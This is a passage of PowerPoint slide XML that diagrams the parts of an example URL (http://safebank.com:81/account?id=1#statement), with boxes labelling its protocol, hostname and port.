              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E92B453-7507-6149-B064-57F472ADA79E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5289550" y="4229100"/>
            <a:ext cx="1295400" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25399">
            <a:solidFill>
              <a:srgbClr val="2D2D8A"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="20320">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#statement</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E24E42C-3B80-EA4E-90F3-0D2A38790339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4554538" y="4229100"/>
            <a:ext cx="735330" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25399">
            <a:solidFill>
              <a:srgbClr val="2D2D8A"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>?id=1</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54D26237-42F9-C24F-B9F8-53B2AA534FA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3232149" y="4229100"/>
            <a:ext cx="381000" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25401">
            <a:solidFill>
              <a:srgbClr val="2D2D8A"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>:81</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEBCEEB3-CF0E-DF4D-883D-E288C71B5CF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="942975" y="3863340"/>
            <a:ext cx="2285365" cy="679450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="34925" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="275"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="68580">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="175"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>safebank.c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>om</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4926D09E-D761-6C42-B4B9-3D00518C5ABC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3568331" y="4212590"/>
            <a:ext cx="985519" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/account</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{984E64EA-47EC-944D-9A78-BD57E2B3C683}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156568" y="4212590"/>
            <a:ext cx="167005" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C50AE79B-84B5-6441-8013-FEA81651BA0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946150" y="4229100"/>
            <a:ext cx="685800" cy="285750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="685800" h="285750">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="685799" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="685799" y="285750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="285750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25399">
            <a:solidFill>
              <a:srgbClr val="2D2D8A"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BA29A02-4B1D-3F41-BCFD-8558E67A42C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1624012" y="4229100"/>
            <a:ext cx="1608455" cy="285750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1608455" h="285750">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1608136" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1608136" y="285750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="285750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25399">
            <a:solidFill>
              <a:srgbClr val="2D2D8A"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C625178-0187-2E4B-AD84-6A248EEF7843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3232150" y="4229100"/>
            <a:ext cx="381000" cy="285750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="381000" h="285750">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="380999" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380999" y="285750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="285750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25399">
            <a:solidFill>
              <a:srgbClr val="2D2D8A"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{406901EE-FB29-3347-A499-A1DAE646E624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1238245" y="4524524"/>
            <a:ext cx="2540" cy="334010"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2540" h="334010">
                <a:moveTo>
                  <a:pt x="0" y="333447"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2258" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A78E8258-2687-9149-A021-78BAE198C7E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4854574"/>
            <a:ext cx="1020444" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="30480" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr marL="144780">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240"/>
              </a:spcBef>
              <a:defRPr sz="1400" b="1" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Protoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ol</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B8B662B-3A46-414F-8EAD-1E81153BF384}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1680850" y="4517647"/>
            <a:ext cx="1232525" cy="676327"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A470D68-5316-1B43-B313-AAD37D8176D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2328854" y="4542410"/>
            <a:ext cx="38100" cy="302895"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="38100" h="302895">
                <a:moveTo>
                  <a:pt x="0" y="302862"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="37650" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88228BB4-946C-6743-BFBD-C8D2E9F6567A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1725612" y="4854574"/>
            <a:ext cx="1143000" cy="274955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="30480" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="144780">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Hostname</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{902FD1D0-025F-EC4C-B1C2-C418CD88E5B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2865126" y="4480407"/>
            <a:ext cx="1003925" cy="1197755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45273E82-056A-CD41-82A6-FAAD9E232D6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3423717" y="4505169"/>
            <a:ext cx="19685" cy="837565"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="19685" h="837564">
                <a:moveTo>
                  <a:pt x="19568" y="836992"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F45F5A65-93F2-BF42-A3BE-677557FC95A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2909889" y="5338762"/>
            <a:ext cx="914400" cy="274955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="31114" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="243840">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="244"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Port</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{781A533D-6DDB-2741-B72A-C3E1723DECB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3950181" y="4485913"/>
            <a:ext cx="1003925" cy="1192248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D25411D7-CA2B-3B4F-8E30-A0A10548BD03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143717" y="4510676"/>
            <a:ext cx="92710" cy="819150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="92710" h="819150">
                <a:moveTo>
                  <a:pt x="92527" y="818783"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF0717C1-26DF-F840-B70E-1B4B254E43B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3994944" y="5338762"/>
            <a:ext cx="914400" cy="274955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="31114" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="243840">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
